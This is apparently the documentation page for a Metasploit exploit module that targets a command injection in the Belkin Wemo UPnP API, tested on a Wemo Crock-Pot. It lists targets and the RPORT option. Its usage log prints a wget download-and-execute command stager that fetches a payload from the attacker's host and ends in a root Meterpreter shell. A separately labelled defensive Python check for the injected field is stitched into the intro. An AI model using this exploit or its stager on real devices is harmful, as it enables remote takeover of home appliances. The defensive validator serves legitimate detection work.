Intro
This module exploits a command injection in the Belkin Wemo UPnP API via
the SmartDevURL argument to the SetSmartDevInfo action.
This module has been tested on a Wemo-enabled Crock-Pot, but other Wemo
devices are known to be affected, albeit on a different RPORT (49153).
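A defender-side check for the injection point named above, added here as an example and not taken from the module or from Belkin: it inspects a captured UPnP SOAP body and flags any SetSmartDevInfo call whose SmartDevURL is not a plain http(s) URL. The allowlist pattern, the function names, and the sample envelope (including its namespace) are assumptions constructed for illustration.

```python
import re
import xml.etree.ElementTree as ET

# Assumed policy: scheme, host, optional port, and a path limited to
# characters a shell does not interpret. Anything else is reported.
SAFE_URL = re.compile(r"https?://[A-Za-z0-9.-]+(:\d{1,5})?(/[A-Za-z0-9._%/-]*)?")


def local(tag):
    """Strip the '{namespace}' prefix ElementTree puts on tag names."""
    return tag.rsplit("}", 1)[-1]


def inspect_soap(body):
    """Return a list of findings for one captured SOAP request body."""
    # Refuse DTDs up front so entity-expansion tricks never reach the parser.
    if "<!DOCTYPE" in body or "<!ENTITY" in body:
        return ["DTD present, body not parsed"]
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return ["unparseable SOAP body"]
    findings = []
    for action in root.iter():
        if local(action.tag) != "SetSmartDevInfo":
            continue
        for arg in action:
            if local(arg.tag) != "SmartDevURL":
                continue
            value = (arg.text or "").strip()
            if not SAFE_URL.fullmatch(value):
                findings.append(f"SmartDevURL fails allowlist: {value!r}")
    return findings


def sample(url):
    """Constructed envelope for testing; not a capture from a real device."""
    return (
        '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body>'
        '<u:SetSmartDevInfo xmlns:u="urn:Belkin:service:basicevent:1">'
        f"<SmartDevURL>{url}</SmartDevURL>"
        "</u:SetSmartDevInfo></s:Body></s:Envelope>"
    )


if __name__ == "__main__":
    # Constructed inputs: one ordinary URL, one carrying shell metacharacters.
    for url in ("http://192.0.2.10:8080/info.xml", "http://192.0.2.10/`PLACEHOLDER`"):
        print(url, "->", inspect_soap(sample(url)) or "ok")
```

The same function can be run over request bodies exported from a proxy or packet capture of traffic to the device's UPnP port.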
Setup
You may buy the device on Amazon at https://www.amazon.com/dp/B00IPEO02C/.
Targets
Id Name
-- ----
0 Unix In-Memory
1 Linux Dropper
Options
RPORT
Set this to the Wemo device's UPnP port. In our testing, this was 49152 for the Crock-Pot and 49153 for other devices.
Usage
msf5 exploit(linux/upnp/belkin_wemo_upnp_exec) > run
[*] Started reverse TCP handler on 10.22.22.4:4444
[+] Wemo-enabled device detected
[*] Found firmware version: 2.00.6461
[+] Firmware version 2.00.6461 < 2.00.8643
[*] 10.22.22.1:49152 - The target appears to be vulnerable.
[*] Using URL: http://0.0.0.0:8080/CKgRyLqQZtBY6
[*] Local IP: http://[redacted]:8080/CKgRyLqQZtBY6
[*] Generated command stager: ["wget -qO /tmp/aOLC8QmRUAMLeQXrxSLP2KuMYqEvD2P http://10.22.22.4:8080/CKgRyLqQZtBY6", "chmod +x /tmp/aOLC8QmRUAMLeQXrxSLP2KuMYqEvD2P", "/tmp/aOLC8QmRUAMLeQXrxSLP2KuMYqEvD2P", "rm -f /tmp/aOLC8QmRUAMLeQXrxSLP2KuMYqEvD2P"]
[*] Regenerated command stager: cp /bin/sh /tmp/aOLC8QmRUAMLeQXrxSLP2KuMYqEvD2P;wget -qO /tmp/aOLC8QmRUAMLeQXrxSLP2KuMYqEvD2P http://10.22.22.4:8080/CKgRyLqQZtBY6;/tmp/aOLC8QmRUAMLeQXrxSLP2KuMYqEvD2P;rm -f /tmp/aOLC8QmRUAMLeQXrxSLP2KuMYqEvD2P
[*] Client 10.22.22.1 (Wget) requested /CKgRyLqQZtBY6
[*] Sending payload to 10.22.22.1 (Wget)
[*] Transmitting intermediate stager...(164 bytes)
[*] Sending stage (1252312 bytes) to 10.22.22.1
[*] Meterpreter session 1 opened (10.22.22.4:4444 -> 10.22.22.1:4607) at 2019-02-12 14:37:37 -0600
[*] Server stopped.
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer : 10.22.22.1
OS : (Linux 2.6.21)
Architecture : mips
BuildTuple : mipsel-linux-muslsf
Meterpreter : mipsle/linux
meterpreter >